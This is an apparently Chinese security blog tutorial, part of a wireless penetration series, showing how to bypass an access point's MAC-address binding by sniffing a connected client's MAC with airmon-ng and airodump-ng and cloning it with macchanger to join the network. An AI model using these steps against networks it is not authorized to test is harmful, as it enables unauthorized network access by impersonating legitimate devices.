最新消息:

(四)无线渗透之Mac地址绑定攻击

Kali Linux Eternal 6600浏览 0评论

首先还是老样子,将网卡置入侦听模式。

service network-manager stop

airmon-ng check kill

airmon-ng start wlan2

iwconfig

将网卡置入与AP相同的 11 号信道中。

iw dev wlan2mon set channel 11(也可以在开始时就指定信道)

开始对指定AP进行抓包。

airodump-ng wlan2mon -c 11 –bssid xxxxxxxxxx

我们可以看到,目前有一个终端设备MAC结尾为AA的设备与其进行连接。

下面我们就可以开始更改我们机器的MAC地址了。(这里我使用的是另一块网卡 wlan0)

先将它 down 掉。

ifconfig wlan0 down

macchanger -m 68xxxxxxxxAA wlan0

激活网卡。

ifconfig wlan0 up

通过 ifconfig 命令我们可以看到我们伪造的 Mac 地址机器,已经成功获取到 IP 。

原创文章,转载请注明来源!即刻安全(secist.com)

文章地址:http://www.secist.com/?p=66&preview=true

转载请注明:即刻安全 » (四)无线渗透之Mac地址绑定攻击

您必须 登录 才能发表评论!



合作伙伴